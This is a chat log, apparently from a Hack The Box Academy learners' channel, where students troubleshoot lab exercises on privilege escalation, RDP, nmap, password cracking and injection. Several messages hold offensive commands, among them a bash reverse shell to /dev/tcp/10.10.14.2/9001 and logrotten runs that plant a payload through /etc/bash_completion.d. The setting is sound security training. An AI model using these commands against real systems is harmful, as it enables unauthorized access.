#modules

i mean we dont support bash bunny lol

Pwnbox, try it

Also defender scans all connected devices

Marcie asked what it was is all.

I was just being funny 😛

i using kali and parrot

We are telling you. Try the same scan using the in-browser vm

This is one of the times where for some reason the pwnbox just works

ok

Turn off the vpn when you use the pwnbox to avoid issues

ok

Can anybody help with? Assess the web application and use various techniques to escalate to a privileged user and find a flag in the admin panel. Submit the contents of the flag as your answer.

I have to get the flag.txt by enmuerate all contents of every users from 1 to 20 :
But I'm getting nothing.
The default curl command with the example of uid=1 works but in the loop it does not work, why?https://academy.hackthebox.com/module/134/section/1186

hey guys am I trying to sign into rdp session with the pexychain and promted to enter the password what wasn't appered in he session

Well I edited the script from the course because it's... strange and too "big" for nothing :/.

Do you need to put this in quotes?

linux is going to ignore the $ otherwise, i think

I tried with and without but I did not got an output.

ahh ok

So...

try curl?

I just recreated a script with only one loop.

And just sending request reponse.

With which UID.

the script they give with curl worked for me

Maybe I did a mistake idk xd.

i think it was a literal copy/paste from the module

Yeah maybe :/.

Could someone explain me in detail everything that I get with the monthly subscription of htb academy of student?
And I want to know if it's worth it and what level of content is there, since I have been using htb machines for a long time and I want to know if the level of this subscription would be worth it for me.

it pretty much explains what you get on the page. i believe it's up to tier2 access for the modules. as far as the content is concerned, it's the best out there to learn

with the student subscription you get access to all tier 0, 1 and 2 modules while you are subbed. Any module you finish during your sub is yours to keep, as well as any cubes you earn by doing that. That's enough to do the path for the CDSA, CBBH and CPTS certs, but not enough for the advanced CWEE cert or any of the other advanced tier 3/4 modules

Hi guys, maybe someone can help me out I'm trying to sign with xfreerdp to the provided host to complete the task https://academy.hackthebox.com/module/158/section/1426 but I get promted for the password for custom certificate thanks in advance

logon failure, bad user/pass

2 /u?

You need to surround the password in quotes 'like this' because it contains a special char that's being ignored by the terminal. /p:'pass@123'

Nah he put the password as a second /u:

that too lol

So xfreerdp took the second one as the intended user

Thank you so much guys my bad lol @cloud urchin @next bronze @fathom pendant

We all make mistakes

I didn't even hoped for answer really, seems like it's a really cool community

Saying that, it would also help my preparation for OSCP, because this summer I plan to do it.

I like it too. It beats OffSec by leaps and bounds.

Well I found it was a ||GET|| request and trying to create a script but how to encode for URL? https://academy.hackthebox.com/module/134/section/1187

just add ##.warning.global.alert-notification-banner to ublock origin

Thanks!

@mint trout that works beautifully, thank you

all i did to get that was click ublock->eyedropper->yellow banner btw, enjoy 👍

Found an algo to encode it but there is no a command to do it fastly? 🤔

Remote/reverse port forwarding. Via pivoting chapter. Directions show a power shell command being done to download the payload, but I see no part of the direction where the engagement initially logs into the internal windows host. It’s confusing because I attempted to follow along with the lab, but I don’t have creds. I am assuming those creds are the prior chapter. Dynamic port forwarding that was previous. I attempted to proxy chains nmap v pn that same ip, but it’s not reflecting a windows RDP port.

Proxy chain nmap v pN -sT 172.16.5.129 doesn’t reflect an open RDP port to complete remote reverse port forwarding. Also the questions don’t ask to retrieve a flag from this. Is the student meant to copy the example for this particular lab? It’s a bit confusing with what’s being asked. The two questions were very simple which leads me to think this is just to be shown, not done.

172.16.5.1 and 172.15.5.200 are open but no RDP ports

i missed the hour on logrotate exploitation, not sure how to force another since i cant access /var/lib/logrotate.status or force it; do i have to wait or am i missing something?

an hour??

u waited an hour?

well i ran logrotten at 4:55 so no just 5 minutes

but now i might have to lol

lol you have to be super quick

i hated doing that part pain in the ass

so what i have to leave this running or am i missing something 😅

u can trigger the logrotten btw

aw man ok

u do know which file it is?

i thought it would be with space but it didnt work

yeah

so if u write to the file it will trigger the logrotten

idk doesnt seem to be :\

its been a while since i done that module

do u have two ssh open?

its maxsize 1k and mines 12kb, i think it still waits for the hour doesnt it

logrotten is running in bg rn but i did before yea

what are you doing?

./logrotten -p payload mon.log ?

im pretty sure its not the mon.log

its only file i can write to

u sure?

im looking at my notes and its not mon.log unless they changed it

i see ~/backups/access.log but theres no logrotate pointing to it

pretty sure its the only one

-rw-rw-r-- 1 htb-student htb-student   9053 Apr 12 21:13 /home/htb-student/mon/mon.log
-rwxr-xr-x 1 root        root           141 Mar  7  2019 /usr/lib/rsyslog/rsyslog-rotate
-rwxr-xr-x 1 root        root           141 Mar  7  2019 /usr/lib/rsyslog/rsyslog-rotate
-rw-r--r-- 1 root        root             1 Jun 14  2023 /var/log/alternatives.log
-rw-r----- 1 root        adm           4905 Apr 12 20:49 /var/log/apport.log
-rw-r--r-- 1 root        root             1 Jun 14  2023 /var/log/apt/history.log
-rw-r----- 1 root        adm              1 Jun 14  2023 /var/log/apt/term.log
-rw-r----- 1 syslog      adm          52663 Apr 12 21:16 /var/log/auth.log
-rw-r--r-- 1 root        root             1 Jun 14  2023 /var/log/dpkg.log
-rw-r----- 1 syslog      adm         261532 Apr 12 20:49 /var/log/kern.log
-rw-r----- 1 syslog      adm         723595 Apr 12 21:16 /var/log/syslog

now how do u check if it is /backups/access.log ?

grep -ri /backups /etc/logrotate.d/ ?

have u tried writing to it and see if another access.log.2 appears?

wtf. .

or access.log.1 if it wasnt already there

but why though?

i saw it first thing and thought it was some gotcha because theres no logrotate.d for it ...

ding ding ding u found the correct one

but why is it correct lol

oh cos its in the logrotate.status fml

dont worry i was so lost as well

so annoying its the first thing i saw and went on this trail because i thought im so smart... u got me htb devs

lol at first i didnt even see it

until i kept looking around and voila

oh

i guess i did try this earlier and logrotten just has no output other than "waiting for rotating"

ok got it.. it's because I specified a relative path (just access.log) it has to be ./access.log for the tool for some reason

yeah u got to trigger the rotating by writing to the access.log file

i know, what im saying is the tool requires ./access.log or /path/to/log, just log doesnt work its silently failing

Anyone having issues with RDP? I'm currently doing the Windows Privilege Escalation the section about Legacy OS and I have to RDP into the system but I am getting this error with xfreerdp and Remmina "ERRCONNECT_TLS_CONNECT_FAILED", I've had no issues with RDP before, I've tried resetting the machine a few times to no avail and It's really bugging me

Edit: Tried using rdesktop with no issues. I'm guessing since I'm trying to RDP into a legacy system something about xfreerdp and Remmina are making that difficult. So If anyone else has issues like that in this module try rdesktop

MODULE: Into to Whitebox Pentesting
SECTION: Skills Assessment

I Found the injection point, but I am having issues crafting a working payload to get code execution. Can I DM someone to see what my code is missing

I think for xfreerdp

You need to add /sec-rdp

Figures that's the only option I didn't try before giving up and using rdesktop lol

I'm working on this thing, we can collab if you want

we can bounce around some ideas, DM?

Sure!

MODULE: Getting started
SECTION: Knowledge check

I have a reverse shell in the user, and on my attacker VM, I ran a python http server in the directory where LinEnum.sh is located.
I then tried running wget to the ip and port with the file, but I always get this error

> wget http://10.10.34.256:8121/LinEnum.sh

Connection to 10.10.34.256:8121... connected
HTTP request sent, awaiting response... 200 OK
Length: 46631 (46K) [text/x-sh]
LinEnum.sh: Permission denied
Cannot write to 'LinEnum.sh' (Permission denied.)

Also it says broken pipe on my other terminal

Do you have permission to write to the directory you're trying to download it to?

I don't think so, it says drwxr-xr-x 3

Where can I find a directory I can write in?

what's the user/group perms for the group

/tmp is usually writeable

tysm

It sounds like you found yourself a collaborator already, so I won't detract from the learning process. This skills assessment gives a lot of open ground to explore and feel-out how to arrive at a solution. Rather than be prescriptive about what worked (because that detracts from the core of the problem set), I'll highlight what didn't work for me (so as to save you time). The following assumes you...

• (A) have correctly found an injection point
• (B) Have a local server to test against
• (C) Are correctly navigating through the application's authentication mechanism(s).

All that aside:

• First, I tried to have the server re-write its own code, only to realize I lacked the ability to gracefully restart the server (I could get the server to crash/restart, but that appeared to just erase any edits I made).
• My biggest problem was figuring out where to write the output of any commands I'd push; testing locally, it was trivial to write the output to console.log (but you don't have access to that against the remote server). The vast majority of my troubleshooting efforts was spent working on this problem.
• I thought for sure that I was supposed to use the dead code present in order to read the flag (i.e. somehow leveraging the cat() function to read the flag). While I was able to get such a way working locally, it never succeeded for me against the remote target.
• I also tried having the server make an HTTP request back to my attacker machine, appending the file contents as a b64-encoded URL (e.g. http://attacker/flagcontentsgetappendedhere). This didn't workout either; I didn't investigate this in-depth, but I think this is related to the way the docker instance is configured in what it is(n't) permitted to do.
• Ultimately, what worked for me didn't involve any of the above.

I hesitate to be prescriptive that what you're doing is right/wrong, because the problem explicitly says there are multiple ways about arriving at a solution.

Hi

Who can hack an Instagram account?

no one here, read the #rules

is it ok if I DM you to run some ideas by you ?

For the life of me I don't know what I'm doing wrong. The second half of the question is confusing me, I'm not sure what they mean by "search for the flag through a JSON POST request to '/search.php'". Any explanation would help so I can figure it out myself

I've tried various versions of
'{"search":"london"}'

"{\"search\":\"london\"}"

have you tried '{search:"london"}'?

it looks like the key isn't in quotes

also why "POST"?

shouldn't it be GET?

oh wait didn't read the Q

Hey, just tried it without quotes on search but didn't work either, same invalid json response.

I take it you're doing an inspect for when you do the search from the admin login

so you can see the request

also in your screenshot

{\"search\":"\london\"}

Yeah sorry that should've been in the original screenshot, here you go.

you didn't escape the internal one

if you're meant to do {\"search\":\"london\"}

oh gosh, def haven't tried that, thanks I'll give it a try now

also not sure if you need to wrap the json in the single quotes

but one step at a time

I see now how a single open ; could ruin your day 😅

yeah the misplaced \ was at least the first thing that stuck out to me

then from there it's just modifying the request to get the right search query

also: why do you have ip:port'/search.php'

(i mean if that works it works, just weird to me)

oh my goodness that actually worked, it didn't give the flag but it actually finished the search

👍

i mean you can likely make an educated guess where to search for the flag lol

I will do my best, thank you so much Marcie!

step 1 is just making it work

INTRODUCTION TO DIGITAL FORENSICS
Quick one

For the Velocirapitor section

• 2 Using VAD analysis, pinpoint the suspicious process and enter its name as your answer. Answer format: _.exe
  For this we add new hunt and selec atefact [Windows.System.VAD] ?

Hey
I am stuck with a problem on buffer overflow. Can someone help?

Now I have no idea what to do 😂 but f it we ball

why not start by searching for ||"flag"||

istg I'm going to ||reeeeeeeeeeeeeeeee||

I'm laughing and crying rn 😂

is this what it's always going to be like

Thank you so much 😂 oh gosh hahaha

anyone have issues getting a shell with logrotten in the privesc module?

Have you tried triggering logrotate to do its job?

yeah

logrotten is (stating it's) executing

payload has tested with my user, works fine. but not with LR

htb-student@ubuntu:~/backups$ echo "asdf" >> access.log && ./logrotten -o -p ./payload ./access.log
Waiting for rotating ./access.log...
Renamed . with .2 and created symlink to /etc/bash_completion.d
Waiting 1 seconds before writing payload...
htb-student@ubuntu:~/backups$ echo "asdf" >> access.log && ./logrotten -s 5 -p ./payload ./access.log
Waiting for rotating ./access.log...
Renamed . with .2 and created symlink to /etc/bash_completion.d
Waiting 5 seconds before writing payload...

same output if i use 2 shells and have it running the whole time whilst i use echo its not a race thing

Looks like you're on the right path I'm not sure why it's not triggering the payload, I did this module a few weeks ago and looking at my notes seem to align with what you're doing. Maybe there are some logrotate experts in here that can identify what the issue is

My next guess would be to double check the payload again but you said the payload seems to be working

I've tried setting up odat.py to interact with the Oracle DB in the Footprinting module twice now, and I'm it's not on the pwnbox by default...

Is there another tool I can use, or some other option?

https://hastebin.com/share/fujeyizimo.bash

do you guys ever use vuln scanners for cpts or just in general for ctfs?

why crosspost @sleek moss

because i want to?

im unable to spawn the target exercise for file transfer module

it been in "spawing" for about 10 mins now

Change your vpn server.

tried, still didn't work :/

Looks like you are sending the echo "asdf" prior to logrotten running. Have you tried to flip what you have or try to ssh in again and sending it separately after you have logrotten running?

yes.

^

its making the symlink but not putting anything in /etc/bash_completion.d

yeah just tried, same output and same thing

Hmmm, maybe try single quotes instead or overwriting the access log completely, Just throwing stuff out there. Odd for sure

seems like you are on the right track

im appending not overwriting :////

this box bully me

I feel you an echo 'asdf' > should work . I'm guessing you prob already reverted

yeah i took a few hour break and reset it and seems like same thing lol i must be doing something wrong but everyone tells me im doing what they did

and i followed the wiki its a walkthrough section so like... idk how you can even fk it up

feel like i just got a payload to run with a tmux shared socket but i couldnt access it so it was worthless anyway, and i couldnt get it again

yeah it's been a journey for sure , lots of headaches along the way too. lol

I'm also stuck on this. I followed the directions, though I'm not sure why the certificate is listed twice in SAMLRaider.
I've got one certificate with a private key, one without. I'm not entirely sure why we need two of them? Shouldn't there just be one certificate with a private key:true?
Yet I also keep getting redirected to root after re-signing the assertion. The correct certificate (with privatekey:true) is selected.
I checked the MD5 hashes match and they do.

┌─[/tmp/certs]
└──╼ [★]$ openssl x509 -noout -modulus -in pub.crt
Modulus=D4F3076268598F7D3C9162E16554F8BCEBA5AB1FFD89B9B907CE9F3D6C1428A4368B5D8C62DCF4EEDCEE90FCA68AC4C38506AAC89F0AA9BFFA26386678C9C439D4EF48F9873BC9B5655BDE254E8DA0A467FE63FF043EC55B9D9685BAD45CB49E1D548A7D690D93A4B8864F4C57D4ECC13BF24482AF46CC345FF81F9EA92BA097
┌─[/tmp/certs]
└──╼ [★]$ openssl rsa -noout -modulus -in private.pem 
Modulus=D4F3076268598F7D3C9162E16554F8BCEBA5AB1FFD89B9B907CE9F3D6C1428A4368B5D8C62DCF4EEDCEE90FCA68AC4C38506AAC89F0AA9BFFA26386678C9C439D4EF48F9873BC9B5655BDE254E8DA0A467FE63FF043EC55B9D9685BAD45CB49E1D548A7D690D93A4B8864F4C57D4ECC13BF24482AF46CC345FF81F9EA92BA097

edit: solved (for me anyway) I was logging in as admin and I don't think that works. try jasmine instead.

https://academy.hackthebox.com/module/103/section/1008#questionsDiv

what input field is vulnerable in this section?

@mint trout u still unable to get a rev shell?

yes, just got a session open in metasploit with a bind shell but it closed instantly when i tried to connect

yeah that happend to me as well, i had like one min after i catch the shell via nc and it closes

cant get a nc shell at all with the gtfobin format

gtfobin format?

and my box just die with 68 mins left ? wtf

yes, this shell https://gtfobins.github.io/gtfobins/bash/#shell

refresh the page

ya i have to spawn again.. so the box died..

whats the point in the timer 🤣

sometimes it glicthes out

maybe the rest help

but this is the payload i used for the payload

echo 'bash -i >& /dev/tcp/10.10.14.2/9001 0>&1' > payload

yes, tried this one, same from the htb page right

lets try with the reset box maybe i have better luck 1sec

nah same thing lol..

yeee and on first ssh box run the exploit and on the sec ssh box trigger the logitrotate and then run the exploit again and trigger it until u catch a shell on nc then on nc u should have like a min so u can make a rev shell and then execute it on it then u would have a shell that wont die

obv u will need to set up two diff nc listeners

u just got to be quick as soon as u get the first shell being root run another rev shell to catch so it wont die

has anyone done the HTB AD skills asssessment Part 2? im supposed to escalate to admin and was trying to run the printspoofer from mssqlclient but im trying to figure out how to do exactly do that from mssqlclient

i cant even get it though, and the one connection i had closed before i could do anything

im spamming it like you said, not 1 connection

strange yeah i hated that as well, maybe keep on trying

alright ill keep trying thx

cause thats the only solution that worked for me

i literally had the same problem

i searched the discord seems lke im not the only one but all the people helping say "dm" so i dont know what they did

maybe try to dm one of them and hope they respond

maybe try a diff port??

ye tried that xd and those people last activity was jan 26th

💀

@errant moss @solar cradle where are you guys what did you guys see 😮

Why is HTB xfreerdp don’t connect anyone have ideas please

whats the error?

Errconnect_connect_Cancelled [0x0002000b]

I tried screenshot there can’t

u are doing xfreerdp /v:<ip> /u:<user> /p:<'password'>

Yes

maybe restart the machine

Did you manage to sort this @faint trellis ? I noticed your question in the forums as well. https://forum.hackthebox.com/t/weak-public-private-keys/273935
Opening another session in a private window also didn't help.
edit: I've sorted this now, by logging in as jasmine rather than admin

i finally got it spamming it the entire time... catting the flag to my folder was easier than a whole shell

LETS FUCKING GOOO

see spamming worked LOL

man i just feel so dumb im immediately stumped at the very next one.. already tried pwnkit and baron samedit and seems like they're patched i dont know what other 2021 kernel exploit they want

u good lol i forgot what i did for that one tbh

maybe i can look for it

i just privesc using the nfs method and steal the flag... its literally 'find the one we want you to use and copy paste it and compile' which i can do anyway so 🤷

oh the hint is the cve, i couldnt find it by looking for the uname

lol

lol

win is a win

so you writing notes for academy? i take notes for boxes but not really sure what to even really write down here lol

not the boxes themselvs but on the commands and what they taught me

on the box when i get stuck and i see sum that xan clearify more on my notes then i will write it

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

I'm doing the sessions challenge #2 under Metasploit and I've obtained a shell...but I can't run whoami or any other command I've found to figure out who I'm logged in as after using the exploit?

[-] Unknown command: whoami

Nevermind. I just cat'd /etc/passwd and started spamming usernames XD

Now I can't check the sudo version XD

[-] Unknown command: sudo

you need to type shell first.

Ah...you the man!

nmap is showing SNMP V3, so I thought I needed a username and password to do snmpwalk. But I was able to run it with V2

is there anybody who has completed the Password Attacks - Hard lab that I could have a quick DM with pls to get some help with initial access? Have been at this for hours want to at least validate that I'm doing the right thing if possible please 🙂

hello can someone help me i am stuck here

also tell us the modules name so people can help

Cross-Site Scripting (XSS) in the bug bounty module

xss discovery

u can also use the hind button if that helps

sadly it dont

patience it is then

How to do the last question of Infiltrating Windows, can anyone tell me

How to do the last question of Infiltrating Windows, can anyone tell me

If you want help here, it helps if you say in which module, which section and for which question you tried what exactly.
If you simply post a question from the modules, nobody will probably know exactly where you are. The chance of getting help decreases rapidly

In SHELLS & PAYLOADS

and what exactly did you try? What does not work?

I typed MS17-010 with msf doesn't work, then I uploaded aspx on port 80 doesn't work either

There are several ms17-010 exploits
Try another exploit

Hi!
Who knows what kind of replacement for the module:
Introduction to Python3
In the description of one of the modules, it is advised to pass it.
But I couldn't find him.

I think I've had a false positive for the Password Attacks Lab - Hard which after almost 2hrs of waiting for it to crack is a real bummer :/ anybody able to give me a hand with this initial access please?

Introduction to Python3: https://academy.hackthebox.com/module/details/88

yes.I use the execute command that works.

great

Look at all the services and think about how you could attack each one. The question gives you a user name.

is it meant to take several hours to get a credential for said user?

I didn't write down how long it took, but I don't think it took that long

it doesn't take that long at all, less than 30 mins

make sure you're using the lists from the module too

I'm using the mutated password list from the module resources yeh

what service are you attacking

rdp

Try another service

I tried SMB first, moved to RDP after not hitting anything in the first hour

There are other services

i was able to do it with RDP. if going the RDP route i would recommend using the tool crowbar, as it's faster than the tools mentioned in the module.

lowercase or uppercase J?

I'm going to reset the box and see if that changes anything 😅

it worked....

got the creds in about 7 mins (ty for the tip on Crowbar for RDP as well) - same wordlist and everything

idk what was happening before but it is what it is haha thanks!

Guys I am still stuck with Password Attacks - Lab Hard

I have managed to get the user d**** password , I am trying to transfer the file but non of the methods are working

smbclient method is giving me an error of connection timeout

I tried over FTP on the attacked machine but files just won't transfer

Lower worked fine for me

I like using Remmina for RDP, it has an option to share a folder. You can do the same with some command with xfreerdp (/drive:local_folder,remote_folder i think).

makes it really simple

Thanks ! Will try it now

Will you be able to switch users?

hi

What do you mean? It's an RDP client. You can save sessions and save multiple users or whatever.

not necessarily, but have a think about other ways with the session you have that you can make that file accessible to your compromised user 🙂

Switching from J*** to D*** to be able to transfer the file

Lets see , Thank btw!

That doesn't really have anything to do with the client I think... there are a few ways to pull that off.

Hey, I am stuck on the last question in HTB Academy DNS Footprinting: " What is the FQDN of the host where the last octet ends with “x.x.x.203”?
i found ip with ....203 but the looks incorrect answer!
any idea ?
thanks thanks

You can DM me your answer if you want, but it will accept the right answer. I can tell you if your answer is correct or not.

Can someone provide any hint for the challenge "pdfy"

tried to install and configure SELinux as suggested by the module and it rekt my VM , good thing I keep snapshots

Tried using CMD with D**** users to Copy the file to J*** and then use the RDP shared folder but the access is denied

have a think about other ways you could access what you're trying to access with the creds you've got

maybe think less like a hacker and more like a user - how would they go about what you're trying to do here?

, Windows Button , Switch user

But this option is not showing haha

haha not this way, another way

I would recommend reviewing the Pass the Ticket from Windows section

Tyyym to dump those hashes

hello i need help pls for hard skill assessement attack common service when i connect me with this cms sqlcmd -S WIN-HARD -U fiona -P 'pwd' -y 30 -y 30 he doesn't work but when i use just sqlcmd he work !! then when i whant find informations on the system it doesn't work whyyy ? my cmd EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [LOCAL.TEST.LINKED.SRV]

https://academy.hackthebox.com/module/116/section/1468

Try executing as someone

When connecting or searching for information?

When searching for info

Impersonation is useful

marcie, how is cpts path going, i see u r very active in here, i havent done anything for 2 months or so 😄

Same. Been busy with other stuff

but now im gonna finish off PW Attacks, only the hard lab left

I havent done anything related to pw lab in a week

yea imo this one is so much stuff to learn in there compared to other modules, so its kinda brain exhausting

I had/have a second interview+ moved countries+ got ill+ didnt bring my pc with me since ill be buying a new one

But i heard it just takes time which i dont have it atm

yes, im learning rn not to rush anything, cuz its my biggest flaw, doing something 24/7 for weeks and then i need few weeks a break, instead i try to do a bit per week constantly

good luck

I'd like to but I've tried to recover all the hashes thanks to responder it only gives me Fiona's and how can I spoof if I can't even log in, I've tried brute force simon there's nothing 🥲

No need for hashes

You start with fiona

Impersonation is something that can be done within mssql

I want to do the usurpation but it doesn't work :

Well perhaps you're trying as the wrong person

Think to the questions and if you've answered one you have the name

i retrying

Try restarting the box. But you're close

hi, someone knows how to connect to linux machine in kerberos attacks modules? I am trying to connect to the linux machine in "kerberosting from linux" module and it's not working, i should use this " Authenticate to 10.129.205.35 with user "htb-student" and password "HTB_@cademy_stdnt!" but when i am trying to use ssh it's not working i tried to add 10.129.205.35 inlanefreight.local to /etc/hosts but it's not working to, do u have any ideas?

is ssh mentioned explicitly?

no

it just this line "Authenticate to 10.129.205.35 with user "htb-student" and password "HTB_@cademy_stdnt!"

why don't you scan the target to find out what it is?

i scaned

and?

it's kerberoasting from linux, so the target is a DC

how do i use this website

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Who can I contact for help with the INTRO TO WHITEBOX PENTESTING SA 1 solution? I'm at the payload implementation stage and I'm having some difficulties that I haven't been able to solve for a long time.

sure

Hello colleagues, how am I in the footprinting hard lab module, I have already listed the SNMP service and I have the private key and I have the user to access the host but I can't find the HTB user

Keep looking around. The path to the end is a lot of back and forth

Transferring files back and forth cracking passwords to move forward

@fathom pendant You mean I'm going for a good ride?

do it manually

I'm doing a module and it asks to spawn a target, but there is no such button/option available. I logged out, refreshed, any ideas ?

Hi all, can someone please help me with the NoSQLi skill assessment 2?

at the bottom there should be a green text saying spawn target i believe

Definitely one of the more satisfying skill assessments

found it, thanks, guess I am clinically blind

lol np

I'll continue on my way to find that answer because I feel like I'm close @fathom pendant

im in PW Attacks Hard lab, i am trying to copy a file from the Windows machine to my linux through xfreerdp, it wont work tho, but from linux > windows it works, thats kinda holding me up rn.

the last msg about the clipboard

What is not working?

anyone can help with advanced sql incections skills asssement part 2. have a script that alowes me basically to do all techniques to uploading files and run it. but nothing works. i think it could be a permission problem, tryed already to upgrad permissions. nothing works. any hints or confirmation for the expected technique to work?

@frozen stone dont randomly DM pls

I can help you, dm ok?

use this option in xfreerdp /drive:linux,/home/urdirectory
and on the windows machine open \\tsclient\ in file manager

this mounts ur local drive on the machine

Is your SQL injection correct?

thy

is someone able to assist me with a module chapter in web attack im not sure what im doing wrong i can share my screen

thx for reply, got already help. was missing some byte multiplications.

Hi all
Any hints for the following question on the powerview module?

The group looks empty when I user powerview and Get-Net/DomainGroupMember

-ComputerName WS01 you use this?

Yeap

-GroupName use this instead of Identity and try with full group name too

and its a localgroup

So thats probably the issue

Still errors out

You have to use different command to enumerate local groups

Parameters are fine

Ill just say that the command doesnt differ much

Found it thanks

any way to disable this?

when you finish a module it becomes impossible to close the share your achievement window because the x is hidden underneath the gold warning bar

delete with ublock origin

oof

hey guys, can anyone help me toward the answer to a question?

any good tool for keepass .kdbx file in linux terminal?

im on the nmap module and they are asking to enumerate a hostname, im kinda lost on that, should i look for specific services or is it a certain script that allows me to do that?

helloo, help please

There's a 2john for that

You need to specify port

yeah already got the pw, i mean for reading the entries now

instead opening it on the target windows

Perhaps it's on the target system

Also: you know the name of the program

It's the same as the windows

can not finish my task because RDP session disconnects all the time

i used keepass2john to get the pw, then ive read the contents in the windows environment, but i wonder if i can also read it on my linux terminal

/timeout:10000

You tried using tcp vpn?

Try: keepass

It's a password storage database

trying from my machine and HTB all the same, right now can not even connect "10:27:40:301] [14769:14770] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
[10:27:40:301] [14769:14770] [ERROR][com.freerdp.core] - failed to connect to"

thanks very much

not installed on my kali, ima look out for it

trying to connect with that command "xfreerdp /u:Administrator /p:'HTB_@cad3my_lab_W1n10_r00t!@0' /v:10.129.235.179 /dynamic-resolution"

Try adding /timeout:10000 if it's timing out

Or reset the target and try again

thanks!

Hi

does anyone know how to do this?

i havent done the module is there more context?

not really, i have an IP with some open ports, they're asking me to enumerate the hostname

i think i'm not using the correct scripts

because it's the ip that pops up, not the hostname

Can you link the module?

Some scripts may work or good ole just looking at the exposed webpage

If there is one

yeah! i tried that, its just an apache2 server

i think they just want me to use the nmap tool, since its the nmap module

Sometimes nmap won't catch everything

enumerating a hostname to me says gobuster tbh

yes! https://academy.hackthebox.com/module/19/section/102

That's domains

And subdomains

i want to enumerate the actual hostname

A host name would be like WS001

oh i didnt see the full question, "Enumerate the hostname of your target and submit it as the answer.".. if someone just told me to 'enumerate the hostname' i would assume they just mixed up hostname and domain, i know the difference lol

is there a tool from john to extract .vhd hash?

it must be on one of the services

i figured

Sht. I started my writeups on firewall evasion.
Can you send a screenshot of your output?

u want to see all the ports available right?

oh, maybe netbios?

Nah its not netbios

Brb let me boot up my machine and check

fyi I just got this using nmap alone

-sC

try using -sC -sV flags

Yea. sC most likely.missing

why?

-sC runs basic enumeration scripts

yeah, it was missing

           SCRIPT SCAN:
             -sC: equivalent to --script=default

it runs --script=banner iirc

Based on the discovered ports

ik, but what does it do?

@cedar forum try doing your same nmap with -sC and -sV and report back

It does this @cedar forum

got the hostname

ahhhhhhh

which one is for .vhd
im a bit lost xD

but i had to enumerate netbios

enumerating port 22 or 80 did nothing

see: nmap --script-help default

mine was on port 31337

no enumerating required, just -sC / -sV

Run file on the .vhd to see what it's encrypted with

but a win is a win is a win

I believe that's for a different question

Hi guys! Doing the intro to pentesting

I am at this question

the hostname of the target?

Payment Card

I think it is ||PCI||

But it does not work 😦

It says the acronym..

that made me more confused XD

Yes I don't recall hostname being on the 31337

you are half right

It might need the -DSS at the end

that was it lol, I was trying ||PCI DSS||, without the -

meh

That's on port 445 bro

???

31337/tcp open  ftp         ProFTPD
Service Info: Host: NIX-NMAP-DEFAULT; OS: Linux; CPE: cpe:/o:linux:linux_kernel

thanks a lot, didn't know it needed the -

xD

its proftpd info

Oh wait your comically large circle made me miss things

xDDDDDD

i forgot to turn down the brush size in paint3d lol sorry, blame microsoft for removing mspaint

I missed the separation after 445 to 31337

idk its underneath 31337 but 🤷 yeah theres many ways to do this it seems, and now carpetes knows 2 more

is it normal that im still confused about what most of these flags do after this section? xD

yes

ik what -Pn and -n do, idk why you want to use them

or --disable-arp-ping even

nmap has a powerful scripting language called NSE, -sC is the same as --script=default which just runs a bunch of scripts, one of which gathers more info

-Pn runs the scan even if the target isnt pingable and i think -n stops name resolution or something

yes, that ik

so, you'd want to use -n when u dont want domain resolution? (for some reason?)

NSE is a pain to set args for

Alright, team, I need a hint on the Information Gathering - Web Edition - Skills Assessment. I'm attempting to identifying the host name of a target server. The instructions, thus far, have not specifically mentioned host names and I'm not really sure how I would do that? Any advice? What do I need to re-read?

My first thought was dig and whois, but that didn't find it.

Next was curl -I $TARGET to see if it was leaked out via headers or something, but nothing there.

The third question?

Pretty sure thats the correct command

yes, question 3.

Let me... 🤔 re-try it?

maybe I just over-looked it.

Yea retry it. Or send the screenshot to see what you got

Its a unique name

I tried the `X-Served-By' header, it didn't seem to like that.

I can see the name of the server

Re read the question

What is the question asking you to find? Which field?

the URL is under location

The question it's asking is: "What server name is returned for the host?" Hint: there is a 5 in the FQDN.

Its not asking about the url

oh

Server then?

@fringe urchin the x-served-by?

Do you have a field that tells you the server: name?

No

Hmmmm.... 🤔

increasing the agression of whatweb and see if that does it.

Its infront of you

No need. I see the correct answer in your screenshot

OK... I'm not sure why I'm missing it.

gimme a second.

The question is asking for a server name
So maybe your response got something like
Servername: xxx xxx
Or
Server: xxx xxx
Etc

OK, it sounds to me like you're hinting at the 'server' field.

correct?

Yes

ok, here's the thing. I've tried that. and It didn't work for me and it doesn't match what I got in the hint. I'll try it.

ok. why did that work now?

Hi, I have a generic quesiton on hte windows privesc module / DLL Injection. I understand how dll injection works, however I don't understand how a user can attach a dll to a system process ? Can we somehow check the rights our current user have on running processes ?

I have no clue what the hint means

I'm so frustrated.

OK. thanks. now I feel absolutely stupid.

Maybe you missleped or added a whitespace at the end?

@fringe urchin could be. 🤷

Whatever. thank you all, again!

I remember a question asking me to give the ntlm hash from a user i had, but it was incorccet. Then randomly worked a few min after

hi everyone. If i buy the exam ticket of "HTB Certified Web Exploitation Expert ", i have all the study path as well or no?

@fringe urchin weird... fkn gremlins, ya'll.

Hey! SO i've just completed the first module of the Pentest job path, the module in which the whole process of pentesting is explained.

I am a bit lost at the final part

So, in this job role path, should I continue with the modules that the job path has? Or should I do 1 technical module and 1 offensive, then do 3 retired machines and so on (whatever says in the above picture)?

Yea continue.
That only gives you an example which is explained further down aswell

You dont need to do other machines/ etc to prepare for cpts. The module will fully prepare you

Yes, read it, but didn't understand exactly if one technical module and one offensive is included in the job path

Or is it something that I have to do besides the job path, to practice what I learn

Ok

Thank you sir!

sorry guys, just started to study HTM after tryhackme, rdp connection disconects all the time , tried timeout , restarting doesn work , machine pings well, can not finish my task. Is it only me who has that problem?

You dont need to.
There are prolabs who are "simmilar" to cpts path but they can over prepare you/ have stuff in which isnt covered in the path.
Some ppl recommend those , some say not needed

For me tcp vpn solved the problem.

I have a question

Can I learn complete hacking with hackthebox?

Except watching videos on YouTube and not learning it completely bcz YouTube doesn't allow

Yes example cpts path will prepare you for a penetration test job

Wdyn

Can I learn like how to make malware for educational purposes and defend against it for free?

There is an exam/path in hack the box that will teach you to make a penetration test on target/targets

Oh

Does it teach offensive and defensive both?

can someone help me on Password Attacks Lab - Hard i cant extract the hash of the vhd with bitlocker2john (signature not found)

There's an offensive path and defensive path

Oh thx and does it teach with videos but not videos on YouTube?

